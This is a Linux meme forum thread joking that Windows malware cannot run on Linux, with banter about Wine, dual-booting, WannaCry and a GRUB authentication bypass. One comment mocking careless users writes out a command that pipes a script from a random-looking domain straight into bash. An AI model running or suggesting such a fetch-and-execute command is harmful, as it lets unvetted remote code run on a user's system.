Sometimes when I've torrenting from a public wifi I'll get a malicious .scr file - but since I torrent from an Android phone it can't do anything to me.
this post was submitted on 28 Feb 2025
980 points (99.1% liked)
linuxmemes
22865 readers
647 users here now
Hint: :q!
Sister communities:
Community rules (click to expand)
1. Follow the site-wide rules
- Instance-wide TOS: https://legal.lemmy.world/tos/
- Lemmy code of conduct: https://join-lemmy.org/docs/code_of_conduct.html
2. Be civil
- Understand the difference between a joke and an insult.
- Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
- Don't get baited into back-and-forth insults. We are not animals.
- Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
- Bigotry will not be tolerated.
- These rules are somewhat loosened when the subject is a public figure. Still, do not attack their person or incite harrassment.
3. Post Linux-related content
- Including Unix and BSD.
- Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of
sudoin Windows. - No porn. Even if you watch it on a Linux machine.
4. No recent reposts
- Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
5. π¬π§ Language/ΡΠ·ΡΠΊ/Sprache
- This is primarily an English-speaking community. π¬π§π¦πΊπΊπΈ
- Comments written in other languages are allowed.
- The substance of a post should be comprehensible for people who only speak English.
- Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed. Β
Please report posts and comments that break these rules!
Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.
founded 2 years ago
MODERATORS
And then it starts running because you set up wine with binfmt_misc, only to crash a few seconds later
Why does your admin account look like a scrotum?
it's where the power is stored
Insert joke about it taking balls to use it
Insert another joke about it being the root of the access tree/graph in the image
Yours doesnβt?
Maybe because scratching an itch there is generally seen as a bad move if you don't know what you're doing.
Remember that time, when it was possible for about 6 years to hack into any Linux system (without drive encryption) which had GRUB by pressing backspace exactly 28 times? Yeah, good old times.
https://www.hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html
Yeah that is not really an "OMG" vulnerability as I can also get into that machine by booting it with a USB drive, or plugging it's drove into my own machine.
That's hyperbole. Such a system can be "hacked" by simply plugging in a usb-stick and booting from that instead, or dozens of other ways.
The only reason to use GRUB authentication I can think of would be in something like a kiosk.
Does anyone here use GRUB authentication? If so why? What's your threat model?
If the adversary has physical access you are generally pwned either way
Breh. What? I feel naked right now.
... and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.
But a forum post said it would fix my issue.
I feel like there's some truth to this!
If the posted answer was in a moderately active thread, you can generally assume it's correct if there are no contradictory replies.
If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.
curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.
Raises hand I might be some people π₯Ί
There's some people in all of us
Let me open up my Linux bible and see if its malicious
load more comments
(4 replies)
This is were WINE comes handy /s
Virus running in wine: "WTF is this place. It's familiar, but it's all wrong!"
WannaCry: Platinium
https://appdb.winehq.org/objectManager.php?sClass=application&iId=18249
WannaCry is believed to use the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA)to attack computers running Microsoft Windows operating systems.
Hehe
now im really tempted to try it, we have a decryptor now dont we?
inb4 decryptor: borked
What works
Encryption - Yes
GUI - Yes
What does not
SMB & Network replication does not always work, may require SMB network patch.
See: Misc Things to configure (Samba Shares)
Some Font rendering issues.
What was not tested
Decryption
Ransom Payment
Uh oh. And giving it "platinum" even though some stuff doesn't work and basic features weren't tested is bullshit. I demand a retraction!
load more comments
(11 replies)
A friend of mine once downloaded something malicious to his Linux machine and wasn't worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, "hey, what's this?" Oops.
He's a tech savvy guy, so I'm guessing the fact he had downloaded it himself really let his guard down.
That's why you don't store your stool samples in the same fridge as your chocolate pudding. Malware goes into the vault.
That's another reason not to dual boot. Ditch Windows.
Wine automatically running:
Modern viruses check the os before deciding which type of file to send your way.
This is why you use a user agent switcher to lie about being windows. It's a form of anti malware!
load more comments
(20 replies)
load more comments
(11 replies)
The virgin bin vs the chad .exe
view more: next βΊ